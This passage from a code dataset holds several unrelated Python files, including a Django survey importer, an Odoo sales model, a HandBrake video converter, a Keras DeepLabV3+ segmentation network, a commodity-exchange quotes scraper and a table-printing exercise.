for i, row in enumerate(newemployees):\n if (i == 0):\n missingattributes = requiredattributes.difference(set(row))\n if missingattributes:\n responsestring = \"Your csv file is missing the following attribute columns: \" + \", \".join(missingattributes)\n return Response({responsestring})\n for j, column in enumerate(row):\n colsdict[column] = j\n\n else:\n try:\n print(eseaaccount.organisation)\n email = row[colsdict['email']]\n firstname = row[colsdict['first_name']]\n lastnameprefix = row[colsdict['last_name_prefix']]\n lastname = row[colsdict['last_name']]\n print('ch')\n respondent = Respondent(organisation=eseaaccount.organisation, email=email, first_name=firstname, 
last_name_prefix=lastnameprefix, last_name=lastname)\n print(i, '--------', respondent)\n respondents.append(respondent)\n except:\n return Response({f\"error in row {i}\"})\n\n for respondent in respondents:\n respondent.save()\n new_survey_response = SurveyResponse.objects.create(survey=1, respondent=respondent, esea_account=eseaaccount)\n subject = f\"Survey for {respondent} regarding {respondent.organisation}\"\n message = f\"Hi {respondent}!\\nWe would like you to take a moment to fill in the following survey as employee of {respondent.organisation} to create a report about the organisation's position in the ethical, social and environmental fields.\\n\\nhttp://localhost:8080/{new_survey_response.token}/\"\n #recepient = respondent.email\n recepient = \"seriousdeejay@gmail.com\"\n # send_mail(subject, message, EMAIL_HOST_USER, [recepient], fail_silently = False)\n return Response({\"The Survey has been succesfully deployed to the provided survey respondents.\"})\n '''","sub_path":"core/utils/import_respondents.py","file_name":"import_respondents.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61770942","text":"'''\n 7 Kyu Convert Color image to greyscale\n p = [R,G,B] => [(R+G+B)/3, (R+G+B)/3, (R+G+B)/3]\n\n'''\nfrom numpy import average\n\ndef color_2_grey(colors):\n return [\n [\n [round(average(subsubarr))]*3 for subsubarr in subarr\n ]\n for subarr in colors]\n\nmatrix =[ [ [123, 231, 12], [56, 43, 124] ],\n [ [78, 152, 76], [64, 132, 200] ]]\nprint(color_2_grey(matrix))","sub_path":"python/color_2_grey.py","file_name":"color_2_grey.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346965835","text":"import logging \nfrom odoo import fields, http, tools, _\nfrom odoo.http import request\n_logger = logging.getLogger(__name__)\nfrom odoo import api, fields ,models\nfrom odoo.exceptions import ValidationError \nfrom odoo.http import request\nfrom collections import OrderedDict\nfrom datetime import datetime\n\nclass sales_order(models.Model):\n _inherit=\"sale.order\"\n tax_id=fields.Many2one(\"account.tax\",string=\"Taxes\")\n survey_sheet=fields.Many2one(\"survey.sheet\",string=\"Survey Sheet\")\n installation=fields.Float(\"Installation %\")\n offer_num=fields.Float(\"Offer Number\",default=1)\n offer_duration=fields.Selection([(\"week\",\"Week\"),(\"month\",\"Month\"),(\"year\",\"Year\")],string=\"Duration\",default=\"week\")\n install_value=fields.Float(compute='get_installion',string=\"Installation %\")\n @api.onchange(\"tax_id\",\"order_line\")\n def get_taxes(self):\n if self.tax_id:\n for rec in self.order_line:\n rec.tax_id=self.tax_id\n \n @api.depends(\"order_line\",\"installation\")\n def get_installion(self):\n if self.installation and self.order_line:\n total_price=0\n for rec in self.order_line:\n if rec.product_id.installation ==False:\n total_price+=rec.price_unit*rec.product_uom_qty\n \n self.install_value=total_price*(self.installation/100)\n \n else:\n self.install_value=0\n @api.constrains(\"installation\")\n def get_install_product(self):\n _logger.info(\"PPPPPPPPPPPPP\")\n _logger.info(self.install_value)\n if self.installation:\n products=self.env['product.product'].search([('installation','=',True)])\n product_id=0\n for prod in products:\n product_id=prod.id\n break\n 
order_lines=self.env['sale.order.line'].search([(\"product_id\",\"=\",product_id),(\"order_id\",\"=\",self.id)])\n if product_id!=0:\n if order_lines:\n order_lines.write({\"price_unit\":self.install_value})\n else:\n self.order_line.create({\"product_id\":product_id,\"name\":prod.name,\"price_unit\":self.install_value,\"order_id\":self.id})\n \n\n\n","sub_path":"hdl-addons/installion_at_so/models/sales_order.py","file_name":"sales_order.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"216196881","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport commands\nimport fnmatch\nimport json\nimport time\nimport shutil\n\nhandbrake = '/usr/bin/HandBrakeCLI'\nffprobe = '/usr/bin/ffprobe'\nffprobe_switches = '-show_format -show_streams -loglevel quiet -print_format json'\npath_to_videos = '/path/to/your/files'\nbase_tv_path = os.path.join(os.path.join(path_to_videos))\n\nclass Converter(object):\n def __init__(self):\n self.classname=\"Converter\"\n\n def getlistofshows(self):\n tmplist = []\n for root, dirs, files in os.walk(base_tv_path):\n for file in files:\n tmplist.append(os.path.join(root, file))\n return tmplist\n\n def convertfile(self, pathtofile):\n outputfile = (\"%s.mp4\" % pathtofile[:-4]) \n convert_command = \"%s -i \\\"%s\\\" --preset=\\\"Normal\\\" -o \\\"%s\\\"\" % (handbrake, pathtofile, outputfile)\n output = commands.getoutput(convert_command)\n os.remove(os.path.join(pathtofile))\n return output\n\n def check_convert_need(self, pathtofile):\n ffprobecommand = \"%s %s \\\"%s\\\"\" % (ffprobe, ffprobe_switches, pathtofile)\n dataresults = str(commands.getoutput(ffprobecommand))\n json_version = json.loads(dataresults)\n video_codec = json_version['streams'][0]['codec_name']\n audio_codec = json_version['streams'][1]['codec_name']\n if video_codec != \"h264\" or audio_codec != \"aac\":\n print(\" - [%s | %s] converting %s\" % (video_codec, audio_codec, pathtofile))\n self.convertfile(os.path.join(pathtofile))\n print(\" - convert completed for %s\" % pathtofile)\n converted = True\n else:\n converted = False\n print(\" - skipping %s\" % pathtofile)\n\nx = Converter()\nfor show in x.getlistofshows():\n x.check_convert_need(show)\n\n\n\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336327559","text":"from keras.layers import (\n Activation,\n Conv2D,\n MaxPooling2D,\n BatchNormalization,\n Input,\n DepthwiseConv2D,\n add,\n Dropout,\n AveragePooling2D,\n Concatenate,\n LeakyReLU,\n)\nimport tensorflow as tf\nfrom keras.models import Model\nimport keras.backend as K\nfrom keras.engine import Layer, InputSpec\nfrom keras.utils import conv_utils\nfrom keras.backend.common import normalize_data_format\n\nrate_LRelu = 0.01\n\n# Force Keras to use 16 bits to free up more memory at the expense of training time.\ndtype = \"float16\"\n# K.set_floatx(dtype)\n\n\nclass BilinearUpsampling(Layer):\n def __init__(self, upsampling=(2, 2), data_format=None, **kwargs):\n \"\"\"\n During its instantiation, it require two up sampling parameter.\n :param upsampling:\n :param data_format:\n :param kwargs:\n \"\"\"\n super(BilinearUpsampling, self).__init__(**kwargs)\n self.data_format = normalize_data_format(data_format)\n self.upsampling = conv_utils.normalize_tuple(upsampling, 2, \"size\")\n self.input_spec = InputSpec(ndim=4)\n\n def 
compute_output_shape(self, input_shape):\n height = (\n self.upsampling[0] * input_shape[1] if input_shape[1] is not None else None\n )\n width = (\n self.upsampling[1] * input_shape[2] if input_shape[2] is not None else None\n )\n return (input_shape[0], height, width, input_shape[3])\n\n def call(self, inputs):\n return tf.image.resize_bilinear(\n inputs,\n (\n int(inputs.shape[1] * self.upsampling[0]),\n int(inputs.shape[2] * self.upsampling[1]),\n ),\n )\n\n def get_config(self):\n config = {\"size\": self.upsampling, \"data_format\": self.data_format}\n base_config = super(BilinearUpsampling, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\ndef xception_downsample_block(x, channels, is_top_relu=False):\n \"\"\"\n Xception Downsample block??? built using TensorFlor/Keras Functional API\n :param x:\n :param channels: key parameter that determine how many POINTWISE convolution happens.\n :param is_top_relu:\n :return:\n \"\"\"\n ##Original Depthwise, Separable ConvStack1:fewer connections, lighter model. I wonder if these can be swapped out for modified version.\n if is_top_relu:\n x = LeakyReLU(alpha=rate_LRelu)(x)\n # DepthwiseConv2D does Conv2D in EACH channel/depth domain (i.e. RGB in color images).\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n # Pointwise Convolution to change the dimension for let's say x*y*5 to x*y*3\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n ##Depthwise, Separable ConvStack2\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=rate_LRelu)(x)\n\n ##Depthwise, Separable ConvStack3, with downsampling stride! NOTICE THE STRIDES! This is where the DOWNSAMPLING happens.\n x = DepthwiseConv2D((3, 3), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n return x\n\n\ndef res_xception_downsample_block(x, channels):\n \"\"\"\n Where Residual block post convolution is COMBINED to the Xception downsample block\n :param x:\n :param channels:\n :return:\n \"\"\"\n # Residual connections post regular convolution 2d WITH STRIDE (downsampled)\n res = Conv2D(channels, (1, 1), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n res = BatchNormalization()(res)\n\n # Xception Downsample block (also downsampled stride 2x2 by ONCE\n x = xception_downsample_block(x, channels)\n\n # Combination of both the residual connection block and the inception downsample block.\n x = add([x, res])\n\n return x\n\n\ndef xception_block(x, channels):\n \"\"\"\n Xception block without any downsampling. 
Notice the LACK of strides in the 3rd separable ConvStack3\n :param x:\n :param channels:\n :return: x underwent THREE times of DepthWiseConv2D at 3x3\n \"\"\"\n ##Depthwise, Separable ConvStack1\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n\n ##Depthwise, Separable ConvStack2\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n\n ##Depthwise, Separable ConvStack3\n x = LeakyReLU(alpha=rate_LRelu)(x)\n x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Conv2D(channels, (1, 1), padding=\"same\", use_bias=False)(x)\n x = BatchNormalization()(x)\n return x\n\n\ndef res_xception_block(x, channels):\n \"\"\"\n Residual Xception block without downsampling.\n :param x:\n :param channels:\n :return:\n \"\"\"\n res = x\n x = xception_block(x, channels)\n x = add([x, res])\n return x\n\n\ndef aspp(x, input_shape, out_stride):\n \"\"\"\n Atrous Spatial Pyramid Pooling: aka Dilated Convolution\n :param x: the input tensor\n :param input_shape: along with out-stride determine the final returned shape.\n :param out_stride: along with input_shape determine the final returned shape.\n :return: x: the output tensor after the series of operations.\n \"\"\"\n\n print(f\"ASPP b0 Shape {K.shape(x)}\")\n\n # B0 Block: Regular convolution? No Dilation?\n b0 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n b0 = BatchNormalization()(b0)\n b0 = LeakyReLU(alpha=rate_LRelu)(b0)\n\n print(f\"ASPP b0 Shape {K.shape(b0)}\")\n\n # B1 Block: Convolution with dilation rate of 6\n b1 = DepthwiseConv2D((3, 3), dilation_rate=(6, 6), padding=\"same\", use_bias=False)(\n x\n )\n b1 = BatchNormalization()(b1)\n b1 = LeakyReLU(alpha=rate_LRelu)(b1)\n b1 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b1)\n b1 = BatchNormalization()(b1)\n b1 = LeakyReLU(alpha=rate_LRelu)(b1)\n\n print(f\"ASPP b1 Shape {K.shape(b1)}\")\n\n # B2 Block: Convolution with dilation rate of 12\n b2 = DepthwiseConv2D(\n (3, 3), dilation_rate=(12, 12), padding=\"same\", use_bias=False\n )(x)\n b2 = BatchNormalization()(b2)\n b2 = LeakyReLU(alpha=rate_LRelu)(b2)\n b2 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b2)\n b2 = BatchNormalization()(b2)\n b2 = LeakyReLU(alpha=rate_LRelu)(b2)\n\n print(f\"ASPP b2 Shape {K.shape(b2)}\")\n\n # B3 Block: Convolution with dilation rate of 12 again?? 
Why not use 18, as in the original ASPP?\n    b3 = DepthwiseConv2D(\n        (3, 3), dilation_rate=(12, 12), padding=\"same\", use_bias=False\n    )(x)\n    b3 = BatchNormalization()(b3)\n    b3 = LeakyReLU(alpha=rate_LRelu)(b3)\n    b3 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b3)\n    b3 = BatchNormalization()(b3)\n    b3 = LeakyReLU(alpha=rate_LRelu)(b3)\n\n    print(f\"ASPP b3 Shape {K.shape(b3)}\")\n\n    # B4 block: image-level features via global average pooling\n    out_shape1 = int(input_shape[0] / out_stride) # for x dimension\n    out_shape2 = int(input_shape[1] / out_stride) # for y dimension\n    b4 = AveragePooling2D(pool_size=(out_shape1, out_shape2))(x)\n    b4 = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(b4)\n    b4 = BatchNormalization()(b4)\n    b4 = LeakyReLU(alpha=rate_LRelu)(b4)\n    # Special B4 layers: upsampling TO the final outershape\n    b4 = BilinearUpsampling((out_shape1, out_shape2))(b4)\n\n    print(f\"ASPP b4 Shape {K.shape(b4)}\")\n\n    # Concatenate all branches; they share spatial dimensions because b4 is upsampled back to the feature-map size.\n    x = Concatenate()([b4, b0, b1, b2, b3])\n    print(f\"ASPP Final X Shape {K.shape(x)}\")\n    return x\n\n\ndef deeplabv3_plus(input_shape=(512, 512, 3), out_stride=16, num_classes=21):\n    \"\"\"\n    The full DeepLabV3+ architecture.\n    :param input_shape:\n    :param out_stride:\n    :param num_classes:\n    :return:\n    \"\"\"\n\n    # Define the model input (the shape is PER image, excluding the batch dimension)\n    img_input = Input(shape=input_shape)\n\n    x = Conv2D(32, (3, 3), strides=(2, 2), padding=\"same\", use_bias=False)(img_input)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = Conv2D(64, (3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n\n    x = res_xception_downsample_block(x, 128)\n\n    res = Conv2D(256, (1, 1), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n    res = BatchNormalization()(res)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n    skip = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(skip)\n    x = DepthwiseConv2D((3, 3), strides=(2, 2), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = add([x, res])\n\n    x = xception_downsample_block(x, 728, is_top_relu=True)\n\n    for i in range(16):\n        x = res_xception_block(x, 728)\n\n    res = Conv2D(1024, (1, 1), padding=\"same\", use_bias=False)(x)\n    res = BatchNormalization()(res)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(728, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(1024, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(1024, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = add([x, res])\n\n    
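# Exit flow: the depthwise-separable stacks below widen the features to 1536 and then 2048 channels before the ASPP head.\n    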
x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(1536, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(1536, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = Conv2D(2048, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n\n    # aspp\n    x = aspp(x, input_shape, out_stride)\n    x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = Dropout(0.9)(x)\n\n    ##decoder\n    x = BilinearUpsampling((4, 4))(x)\n    dec_skip = Conv2D(48, (1, 1), padding=\"same\", use_bias=False)(skip)\n    dec_skip = BatchNormalization()(dec_skip)\n    dec_skip = LeakyReLU(alpha=rate_LRelu)(dec_skip)\n    x = Concatenate()([x, dec_skip])\n\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n\n    x = DepthwiseConv2D((3, 3), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n    x = Conv2D(256, (1, 1), padding=\"same\", use_bias=False)(x)\n    x = BatchNormalization()(x)\n    x = LeakyReLU(alpha=rate_LRelu)(x)\n\n    x = Conv2D(num_classes, (1, 1), padding=\"same\")(x)\n    x = BilinearUpsampling((4, 4))(x)\n    model = Model(img_input, x)\n    return model\n\n\nif __name__ == \"__main__\":\n    model = deeplabv3_plus(num_classes=1)\n    model.summary()\n","sub_path":"ModelLayersSpec.py","file_name":"ModelLayersSpec.py","file_ext":"py","file_size_in_byte":12484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651678307","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n@author: delu\n@file: shop_model.py\n@time: 17/4/20 5:10 PM\n\"\"\"\n\nfrom source.model import ModelBase\n\n\nclass Model(ModelBase):\n    def create_shop(self, params):\n        \"\"\"\n        Create a shop\n        \"\"\"\n        key = 'shop_id, admin_id, shop_name, logo_url'\n        val = '%s, %s, %s, %s'\n        value_tuple = (params['shop_id'], params['admin_id'], params['shop_name'], params['logo_url'])\n\n        return self.insert('tbl_um_shop', {self.sql_constants.KEY: key,\n                                           self.sql_constants.VAL: val}, value_tuple)\n\n    def update_shop(self, params):\n        \"\"\"\n        Update a shop\n        :param params: \n        :return: \n        \"\"\"\n        fields = ['shop_name = %s', 'logo = %s']\n        condition = ' shop_id = %s'\n        values_tuple = (params['shop_name'], params['logo'], params['shop_id'])\n\n        return self.update('shops', {self.sql_constants.FIELDS: fields,\n                                     self.sql_constants.CONDITION: condition}, values_tuple)\n\n    def query_shop_count(self, params):\n        \"\"\"\n        Query the number of shops\n        :param params: \n        :return: \n        \"\"\"\n        condition = ' 1 = 1 '\n        value_list = []\n\n        if 'shop_id' in params:\n            condition += 'and shop_id = %s'\n            value_list.append(params['shop_id'])\n        if 'admin_id' in params:\n            condition += 'and admin_id = %s'\n            value_list.append(params['admin_id'])\n\n        return self.get_rows('tbl_um_shop', {self.sql_constants.CONDITION: condition}, tuple(value_list))\n\n    def query_shop(self, params):\n        \"\"\"\n        Query the list of shops\n        :param params: \n        :return: \n        \"\"\"\n        # fields to select\n        fields = []\n        # query condition\n        condition = ' 1 = 1 '\n        # query bind values\n        value_list = []\n        
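# Build the WHERE clause dynamically: append one SQL condition and one bind value per provided filter.\n        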
if 'shop_id' in params and params['shop_id']:\n            condition += ' and shop_id = %s '\n            value_list.append(params['shop_id'])\n        if 'admin_id' in params and params['admin_id']:\n            condition += ' and admin_id = %s '\n            value_list.append(params['admin_id'])\n        return self.find('tbl_um_shop', {self.sql_constants.FIELDS: fields,\n                                         self.sql_constants.CONDITION: condition}, tuple(value_list))\n","sub_path":"pythonWeb/wm-b2c/v1/module/shop/model/shop_model.py","file_name":"shop_model.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"301867331","text":"import re\n\nimport requests\n\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\ndef get_rhq_html():\n    url = 'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html'\n    ua = UserAgent()\n    headers = {\n        'User-Agent': ua.random,\n        'Content-Type': 'application/x-www-form-urlencoded',\n        'Host': 'www.dce.com.cn',\n        'Referer':'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html'\n    }\n    data = {\n        'day': '07',\n        'dayQuotes.trade_type': '0',\n        'dayQuotes.variety\t':'all' ,\n        'month': '07',\n        'year':'2018',\n    }\n    html = requests.post(url=url,headers=headers,data=data).text\n    return html\n\n\ndef parse_rhq_html(html):\n    soup = BeautifulSoup(html,'lxml')\n    tradeResult02 = soup.find(class_='tradeResult02')\n    tr_list = tradeResult02.find_all('tr')\n    for i in tr_list:\n        td_list = i.find_all('td')\n        new_td_list = []\n        for j in td_list:\n            new_td_list.append(re.sub(r'[\\\n \\t \\r \\xa0]','',j.text))\n        up_data(new_td_list)\ndef up_data(lists):\n    if lists:\n        lists = lists[0],lists[1],lists[5],lists[7],lists[10],lists[11]\n        if lists[0] == '聚乙烯':\n            if lists[1] == '1809':\n                datas['l1809']['1809']=lists\n            elif lists[1] == '1901':\n                datas['l1809']['1901'] = lists\n        elif lists[0] == '聚丙烯':\n            if lists[1] == '1809':\n                datas['pp1809']['1809']=lists\n            elif lists[1] == '1901':\n                datas['pp1809']['1901'] = lists\n        elif lists[0] == '聚氯乙烯':\n            if lists[1] == '1809':\n                datas['v1809']['1809']=lists\n            elif lists[1] == '1901':\n                datas['v1809']['1901'] = lists\ndef qhsc(datas):\n    qhsc = {'l1809':{},'v1809':{},'pp1809':{}}\n    for k,v in datas.items():\n        spj = v['1809'][2]\n        jc = int(v['1809'][2])-int(v['1901'][2])\n        jsj = v['1809'][3]\n        ccl = v['1809'][5]\n        # closing price, spread, settlement price, open interest\n        qhsc[k] = [spj,jc,jsj,ccl]\n    return qhsc\n\ndef get_data():\n    data2 = {\n        'l': 'l1809',\n        'v': 'v1809',\n        'pp':'pp1809',\n    }\n    data_list = []\n    for k,v in data2.items():\n        data = {\n            'contract.contract_id': v,\n            'contract.variety_id': k,\n            'day': '07',\n            'memberDealPosiQuotes.trade_type': '0',\n            'memberDealPosiQuotes.variety': k,\n            'month': '07',\n            'year': '2018',\n        }\n        data_list.append(data)\n    return data_list\n\ndef get_rph_html(data):\n    url = 'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html'\n    ua = UserAgent()\n    headers = {\n        'User-Agent': ua.random,\n        'Content-Type': 'application/x-www-form-urlencoded',\n        'Host': 'www.dce.com.cn',\n        'Referer':'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html'\n    }\n    html = requests.post(url=url,headers=headers,data=data).text\n    return html\ndef parse_rph_html(html):\n    soup = BeautifulSoup(html,'lxml')\n    tradeResult02 = soup.find(class_='tradeResult02')\n    tr_list = tradeResult02.find_all(name='tr')\n    new_td_list = []\n    for i in tr_list[-1].find_all('td'):\n        new_td_list.append(re.sub(r'[\\\n \\t \\r \\xa0 ,]','',i.text))\n    return [new_td_list[6],new_td_list[10],int(new_td_list[6])-int(new_td_list[10])]\nif __name__ == '__main__':\n    # qhsc\n    # closing price, settlement price, trading volume, open interest\n    
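# Flow: fetch the daily quotes page, aggregate per-contract stats, then fetch member position data for each contract.\n    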
datas = {'l1809':{},'pp1809':{},'v1809':{}}\n    html = get_rhq_html()\n    parse_rhq_html(html)\n    qhsc = qhsc(datas)\n    # jcc\n    data_list = get_data()\n    jcc_list = []\n    for i in data_list:\n        html = get_rph_html(i)\n        jcc = parse_rph_html(html)\n        jcc_list.append(jcc)\n","sub_path":"WorksZhang/pingzhong/shuhua/dce_spider_rhq.py","file_name":"dce_spider_rhq.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294968542","text":"# This program takes lists and prints them out in a nicely formatted table.\r\n# It takes the length of lists into account, adjusts width accordingly\r\n# and prints blank when a list has no values left\r\n# while continuing to print the lists which still have values in them.\r\n\r\n\r\ndef calc_max(table):\r\n    max_width = []\r\n    longest_len = 0\r\n    # Loop repeats for every list inside table\r\n    for list_i in table:\r\n        # While looping over the lists assign longest len to var\r\n        if len(list_i) > longest_len:\r\n            longest_len = len(list_i)\r\n        # Assigns len of current lists first index to var\r\n        length = len(list_i[0])\r\n        # Loop repeats for each index in current list\r\n        for index in list_i:\r\n            # If index len is higher\r\n            if len(index) > length:\r\n                # Assigns higher len to var length\r\n                length = len(index)\r\n        # After loop; append highest len value to list width\r\n        max_width.append(length)\r\n    # Assigns the width list and longest_len var to a dict\r\n    # so it can be used in print_table()\r\n    len_width = {'max_width': max_width, 'longest_len': longest_len}\r\n    return len_width\r\n\r\n\r\ndef print_table(table):\r\n    # Runs calc_max() to calc max values and store them in dict\r\n    len_width = calc_max(table)\r\n    # Unpacks dict from calc_max() and assigns its values to vars\r\n    # width = list and contains longest string values from each list\r\n    width = len_width['max_width']\r\n    # length = var and contains int which represents the longest list\r\n    length = len_width['longest_len']\r\n    # Main loop repeats for number of indexes in longest list\r\n    for index in range(0, length):\r\n        # Loop repeats for number of lists present in table\r\n        for list_i in range(len(table)):\r\n            # Tries to print the index's values separated by a space\r\n            # and with rjust() called with the current lists index\r\n            # as the width lists index\r\n            try:\r\n                to_print = table[list_i][index]\r\n                print(to_print.rjust(width[list_i]), end=' ')\r\n            # If no value present at current index; IndexError is raised\r\n            # 'nothing' is printed and it continues with the next list\r\n            except IndexError:\r\n                print(''.rjust(width[list_i]), end=' ')\r\n        # Prints the next loop on a new line\r\n        print('')\r\n\r\n\r\ntable_data = [['apples', 'oranges', 'cherries', 'banana', 'pear', 'kiwi', 'peach'],\r\n              ['Alice', 'Bob', 'Carol', 'David'],\r\n              ['computer', 'television', 'table', 'remote', 'cup', 'couch', 'chair', 'plant'],\r\n              ['candy'],\r\n              ['dogs', 'cats', 'moose', 'goose', 'dolphin']]\r\n\r\nprint_table(table_data)\r\n","sub_path":"LL_table_printer.py","file_name":"LL_table_printer.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540569862","text":"import matplotlib.pyplot as plt\nimport pandas as pd \nimport numpy as np\nimport math\nimport matplotlib.patches as mpatches\nfrom graph_moment import moment_graph\nfrom PIL import Image\nimport os\nimport xlrd\nfrom xlutils.copy import copy\nfrom plastic_moment import 
plastic_moment\n\n\n\nclass Graphplotter:\n \"\"\"\n A cross hair cursor using blitting for faster redraw.\n \"\"\"\n def __init__(self, ax, image, scale_point, shape, row_number, v, k):\n self.scale_point, self.shape, self.v, self.k= [scale_point, shape, v, k]\n\n THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\n my_file = os.path.join(THIS_FOLDER, 'Data','beam_column_data.xlsx')\n\n book = xlrd.open_workbook(my_file)\n # get the first worksheet\n self.first_sheet = book.sheet_by_index(1)\n # read a row slice\n if row_number<100:\n row = self.first_sheet.row_slice(rowx=row_number,\n start_colx=29,\n end_colx=46)\n\n\n self.b, self.d, self.r, self.t_flange, self.t_web, self.c, self.spr, self.s_ult, self.n, self.Eel, self.s_pl, self.curve_pl = [row[2].value, row[1].value, row[4].value, row[3].value, row[3].value, row[3].value, row[9].value, row[10].value, row[13].value, row[12].value, row[15].value, row[16].value]\n else:\n row = self.first_sheet.row_slice(rowx=row_number,\n start_colx=10,\n end_colx=32)\n\n\n self.b, self.d, self.r, self.t_flange, self.t_web, self.c, self.spr, self.s_ult, self.n, self.Eel, self.s_pl, self.curve_pl = [row[1].value, row[0].value, row[4].value, row[3].value, row[2].value, row[3].value, row[15].value, row[16].value, row[17].value, row[18].value, row[20].value, row[21].value]\n if self.curve_pl==\"no data\" or self.s_pl==\"no data\":\n moment, curve = plastic_moment(shape = \"I Beam\", b = self.b, d = self.d, r = self.r, t_flange = self.t_flange, t_web = self.t_web, c = self.c, Eel = self.Eel, spr = self.spr, n = self.n, v = self.v, k = self.k)\n 